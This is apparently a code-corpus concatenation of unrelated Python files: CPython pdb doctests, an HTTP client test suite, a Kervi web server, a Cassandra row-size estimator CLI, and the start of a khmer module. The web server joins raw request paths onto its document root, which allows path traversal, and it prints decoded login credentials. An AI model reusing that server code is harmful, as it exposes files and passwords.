(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... it = test_gen()
... try:
... assert next(it) == 0
... next(it)
... except StopIteration as ex:
... assert ex.value == 1
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> assert next(it) == 0
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(6)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... it = test_gen()
... try:
... assert next(it) == 0
... next(it)
... except StopIteration as ex:
... assert ex.value == 1
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> assert next(it) == 0
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(6)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> assert ex.value == 1
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
class PdbTestCase(unittest.TestCase):
def run_pdb(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
cmd = [sys.executable, '-m', 'pdb', filename]
stdout = stderr = None
with subprocess.Popen(cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
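# Hedged usage note (added, not in the original): 'commands' is fed to pdb's
# stdin verbatim, one command per line, e.g.
#   stdout, _ = self.run_pdb("x = 1\nprint(x)\n", "next\ncontinue\n")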
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13210(self):
# invoking "continue" on a non-main thread triggered an exception
# inside signal.signal
# raises SkipTest if python was built without threads
support.import_module('threading')
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb().set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def tearDown(self):
support.unlink(support.TESTFN)
def load_tests(*args):
from test import test_pdb
suites = [unittest.makeSuite(PdbTestCase), doctest.DocTestSuite(test_pdb)]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server)
self.thread.start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP GET in the wild; these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
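# Hedged usage note (added, not in the original): since the module calls
# unittest.main(), a single case can be selected with the standard unittest
# selector, e.g.
#   python freetests.py TestHTTPClient.testGET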
|
webserver.py
|
#MIT License
#Copyright (c) 2017 Tim Wentzlau
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
""" Simple web server for the Kervi application """
import os
import time
import base64
import json
from socketserver import ThreadingMixIn
import http.client
from kervi.spine import Spine
from kervi.core.authentication import Authorization
import kervi.utility.encryption as encryption
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
except:
from http.server import SimpleHTTPRequestHandler
try:
from BaseHTTPServer import HTTPServer
except:
from http.server import HTTPServer
import socket
import threading
import kervi.ui
import os
class _HTTPRequestHandler(SimpleHTTPRequestHandler):
def __init__(self, req, client_addr, server):
try:
SimpleHTTPRequestHandler.__init__(self, req, client_addr, server)
self.server = server
self.req = req
except socket.error:
pass
def log_message(self, format, *args):
return
def do_AUTHHEAD(self):
print("send header")
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
try:
if self.server.do_authorize() and self.headers['Authorization'] == None:
self.do_AUTHHEAD()
#self.wfile.write('no auth header received')
pass
elif self.server.authorize(self.headers['Authorization']):
if self.path.startswith("/cam"):
path = self.path.split("/")
cam_id = path[-1]
spine = Spine()
print("cam:", cam_id)
info = spine.send_query("getComponentInfo", cam_id)
if info:
conn = http.client.HTTPConnection(info["ui"]["source"]["server"], timeout=self.timeout)
conn.request("GET", info["ui"]["source"]["path"])
res = conn.getresponse()
self.send_response(res.status)
for line in res.headers:
self.send_header(line, res.headers[line])
self.end_headers()
while not self.server.terminate:
chunk = res.read(8192)
if not chunk:
break
self.wfile.write(chunk)
elif self.path.endswith("global.js"):
self.send_response(200)
self.send_header('Content-type', 'text/javascript')
self.end_headers()
if encryption.enabled():
response = bytes("kerviSocketAddress='" + str(self.server.ip_address) + ":" + str(self.server.ws_port) + "';\n\rsocketProtocol='wss';", 'utf-8')
else:
response = bytes("kerviSocketAddress='" + str(self.server.ip_address) + ":" + str(self.server.ws_port) + "';\n\rsocketProtocol='ws';", 'utf-8')
self.wfile.write(response)
elif self.path.endswith("kervitexts.js"):
self.send_response(200)
self.send_header('Content-type', 'text/javascript')
self.end_headers()
texts = json.dumps(self.server.texts)
response = bytes("kerviUITexts=" + texts , 'utf-8')
self.wfile.write(response)
else:
if self.path.startswith("/dashboard/") or self.path.startswith("/connect"):
path = self.server.docpath
else:
path = self.server.docpath + self.path
if os.path.exists(path) and os.path.isdir(path):
index_files = ['/index.html', '/index.htm', ]
for index_file in index_files:
tmppath = path + index_file
if os.path.exists(tmppath):
path = tmppath
break
_, ext = os.path.splitext(path)
ext = ext.lower()
content_type = {
'.css': 'text/css',
'.gif': 'image/gif',
'.htm': 'text/html',
'.html': 'text/html',
'.jpeg': 'image/jpeg',
'.jpg': 'image/jpg',
'.js': 'text/javascript',
'.png': 'image/png',
'.text': 'text/plain',
'.txt': 'text/plain',
}
if ext in content_type:
self.send_response(200) # OK
self.send_header('Content-type', content_type[ext])
self.end_headers()
with open(path, 'rb') as ifp:
self.wfile.write(ifp.read())
else:
self.send_response(200) # OK
self.send_header('Content-type', 'text/plain')
self.end_headers()
with open(path, 'rb') as ifp:
self.wfile.write(ifp.read())
else:
self.do_AUTHHEAD()
except IOError:
self.send_error(404, 'file not found')
def relay_streaming(self, res):
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
try:
while not self.server.terminate:
chunk = res.read(8192)
if not chunk:
break
self.wfile.write(chunk)
self.wfile.flush()
except socket.error:
# connection closed by client
pass
class _HTTPServer(ThreadingMixIn, HTTPServer):
def __init__(self, address, web_port, ws_port, handler):
HTTPServer.__init__(self, (address, web_port), handler)
self.ip_address = address
self.terminate = False
self.ws_port = ws_port
kervipath = os.path.dirname(kervi.ui.__file__)
self.docpath = os.path.join(kervipath, "web/dist")
def do_authorize(self):
return False
def authorize(self, authorize_header):
if authorize_header is None and not self.do_authorize():
return True
else:
authstr = base64.b64decode(authorize_header[6:]).decode('utf-8')
print(authstr)
credentials = authstr.split(":")
print(credentials)
return Authorization.authorize(credentials[0], credentials[1])
SERVER = None
ASSET_PATH = ""
SERVER_THREAD = None
def start(ip_address, http_port, ws_port):
global SERVER, SERVER_THREAD
SERVER = _HTTPServer(ip_address, http_port, ws_port, _HTTPRequestHandler)
if encryption.enabled():
cert_file, key_file = encryption.get_cert()
if key_file and cert_file:
import ssl
SERVER.socket = ssl.wrap_socket (SERVER.socket, keyfile=key_file, certfile=cert_file, server_side=True)
SERVER_THREAD = threading.Thread(target=SERVER.serve_forever, name="webserver")
SERVER_THREAD.daemon = True
SERVER_THREAD.start()
def stop():
#print("stop web server")
SERVER.terminate = True
SERVER.shutdown()
if not SERVER_THREAD.join(5):
print("")
#print("ws terminated")
|
__main__.py
|
#Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#Licensed under the Apache License, Version 2.0 (the "License").
#You may not use this file except in compliance with the License.
#You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from importlib import resources # Python 3.7+
import sys
import logging
import argparse
from threading import Thread, Event
from row_estimator_for_apache_cassandra.estimator import Estimator
def main():
def add_helper(n):
return columns_in_bytes+n
logging.getLogger('cassandra').setLevel(logging.ERROR)
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)
# Event object used to send signals from one thread to another
stop_event = Event()
# Configure app args
parser = argparse.ArgumentParser(description='The tool helps to gather Cassandra rows stats')
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument('--hostname', help='Cassandra endpoint', default='127.0.0.1', required=True)
requiredNamed.add_argument('--port', help='Cassandra native transport port', required=True)
parser.add_argument('--ssl', help='Use SSL.', default=None)
parser.add_argument('--path-cert', help='Path to the TLS certificate', default=None)
parser.add_argument('--username', help='Authenticate as user')
parser.add_argument('--password',help='Authenticate using password')
requiredNamed.add_argument('--keyspace',help='Gather stats against provided keyspace', required=True)
requiredNamed.add_argument('--table',help='Gather stats against provided table', required=True)
parser.add_argument('--execution-timeout', help='Set execution timeout in seconds', type=int, default=360)
parser.add_argument('--token-step', help='Set token step, for example, 2, 4, 8, 16, 32, ..., 255',type=int, default=4)
parser.add_argument('--rows-per-request', help='How many rows per token',type=int, default=1000)
parser.add_argument('--pagination', help='Turn on pagination mechanism',type=int, default=200)
parser.add_argument('--dc', help='Define Cassandra datacenter for routing policy', default='datacenter1')
parser.add_argument('--json', help='Estimate the size of Cassandra rows as JSON', default=None)
if (len(sys.argv)<2):
parser.print_help()
sys.exit()
args = parser.parse_args()
p_hostname = args.hostname
p_port = args.port
p_username = args.username
p_password = args.password
p_ssl = args.ssl
p_path_cert = args.path_cert
p_json = args.json
p_dc = args.dc
p_keyspace = args.keyspace
p_table = args.table
p_execution_timeout = args.execution_timeout
p_token_step = args.token_step
p_rows_per_request = args.rows_per_request
p_pagination = args.pagination
estimator = Estimator(p_hostname, p_port, p_username, p_password, p_ssl, p_dc, p_keyspace, p_table,
p_execution_timeout, p_token_step, p_rows_per_request, p_pagination, p_path_cert)
logging.info("Endpoint: %s %s", p_hostname, p_port)
logging.info("Keyspace name: %s", estimator.keyspace)
logging.info("Table name: %s", estimator.table)
logging.info("Client SSL: %s", estimator.ssl)
logging.info("Token step: %s", estimator.token_step)
logging.info("Limit of rows per token step: %s", estimator.rows_per_request)
logging.info("Pagination: %s", estimator.pagination)
logging.info("Execution-timeout: %s", estimator.execution_timeout)
if p_json is None:
# pass the sampler as the thread target (not its return value) so it actually runs
# in the worker thread and the join() timeout below can bound the sampling run
action_thread = Thread(target=estimator.row_sampler, kwargs={"json": False})
action_thread.start()
action_thread.join(timeout=estimator.execution_timeout)
stop_event.set()
columns_in_bytes = estimator.get_total_column_size()
rows_in_bytes = estimator.rows_in_bytes
rows_columns_in_bytes = map(add_helper, rows_in_bytes)
val = list(rows_columns_in_bytes)
logging.info("Number of sampled rows: %s", len(rows_in_bytes))
logging.info("Estimated size of column names and values in a row:")
logging.info(" Mean: %s", '{:06.2f}'.format(estimator.mean(val)))
logging.info(" Weighted_mean: %s", '{:06.2f}'.format(estimator.weighted_mean(val)))
logging.info(" Median: %s", '{:06.2f}'.format(estimator.median(val)))
logging.info(" Min: %s",min(val))
logging.info(" P10: %s",'{:06.2f}'.format(estimator.quartiles(val, 0.1)))
logging.info(" P50: %s",'{:06.2f}'.format(estimator.quartiles(val, 0.5)))
logging.info(" P90: %s",'{:06.2f}'.format(estimator.quartiles(val, 0.9)))
logging.info(" Max: %s",max(val))
logging.info(" Average: %s",'{:06.2f}'.format(sum(val)/len(val)))
logging.info("Estimated size of values in a row")
logging.info(" Mean: %s", '{:06.2f}'.format(estimator.mean(rows_in_bytes)))
logging.info(" Weighted_mean: %s", '{:06.2f}'.format(estimator.weighted_mean(rows_in_bytes)))
logging.info(" Median: %s", '{:06.2f}'.format(estimator.median(rows_in_bytes)))
logging.info(" Min: %s",min(rows_in_bytes))
logging.info(" P10: %s",'{:06.2f}'.format(estimator.quartiles(rows_in_bytes, 0.1)))
logging.info(" P50: %s",'{:06.2f}'.format(estimator.quartiles(rows_in_bytes, 0.5)))
logging.info(" P90: %s",'{:06.2f}'.format(estimator.quartiles(rows_in_bytes, 0.9)))
logging.info(" Max: %s",max(rows_in_bytes))
logging.info(" Average: %s",'{:06.2f}'.format(sum(rows_in_bytes)/len(rows_in_bytes)))
logging.info("Total column name size in a row: %s",columns_in_bytes)
logging.info("Columns in a row: %s", estimator.get_columns().count(',')+1)
else:
action_thread = Thread(target=estimator.row_sampler, kwargs={"json": True})
action_thread.start()
action_thread.join(timeout=estimator.execution_timeout)
stop_event.set()
rows_in_bytes = estimator.rows_in_bytes
logging.info("Number of sampled rows: %s", len(rows_in_bytes))
logging.info("Estimated size of a Cassandra JSON row")
logging.info("Mean: %s", '{:06.2f}'.format(estimator.mean(rows_in_bytes)))
logging.info("Weighted_mean: %s", '{:06.2f}'.format(estimator.weighted_mean(rows_in_bytes)))
logging.info("Median: %s", '{:06.2f}'.format(estimator.median(rows_in_bytes)))
logging.info("Min: %s",min(rows_in_bytes))
logging.info("Max: %s",max(rows_in_bytes))
logging.info("Average: %s",'{:06.2f}'.format(sum(rows_in_bytes)/len(rows_in_bytes)))
if __name__ == "__main__":
main()
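# Hedged CLI example (added, not part of the original): given the required named
# arguments above, an invocation might look like the following; the endpoint,
# keyspace and table names are placeholders.
#   python -m row_estimator_for_apache_cassandra \
#       --hostname 127.0.0.1 --port 9042 \
#       --keyspace my_keyspace --table my_table --token-step 8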
|
functions.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
"""A collection of functions for use throughout khmer/oxli."""
from __future__ import print_function
import threading
import khmer.utils
def build_graph(ifilenames, graph, num_threads=1, tags=False):
"""
Construct a counting graph from a set of input files.
